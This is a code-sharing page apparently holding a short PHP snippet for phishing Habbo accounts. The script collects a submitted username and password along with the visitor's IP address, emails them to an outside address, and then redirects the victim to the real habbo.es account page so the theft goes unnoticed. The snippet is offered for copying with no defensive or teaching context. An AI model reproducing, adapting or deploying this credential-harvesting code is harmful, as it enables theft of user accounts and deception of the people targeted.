Sumbit to Mail Habbo


/ Published in: PHP
Save to your folder(s)



Copy this code and paste it in your HTML
  1. <?php
  2. $content .= "
  3. Account: " . $_POST['login-username'] . " ";
  4.  
  5. $content .= "
  6. Password: " . $_POST['login-password'] . " ";
  7.  
  8. $content .= "
  9. IP: " . $_SERVER['REMOTE_ADDR'] . " ";
  10.  
  11. mail("[email protected]","Habbo",$content);
  12.  
  13. include ("reload.php");
  14. ?>
  15.  
  16. --------------------------------------------------------------------------------------------
  17.  
  18. reload.php:
  19.  
  20. <head>
  21. <meta http-equiv="refresh" content="0;url=https://www.habbo.es/account/submit"/>
  22. </head>

Report this snippet


Comments

RSS Icon Subscribe to comments

You need to login to post a comment.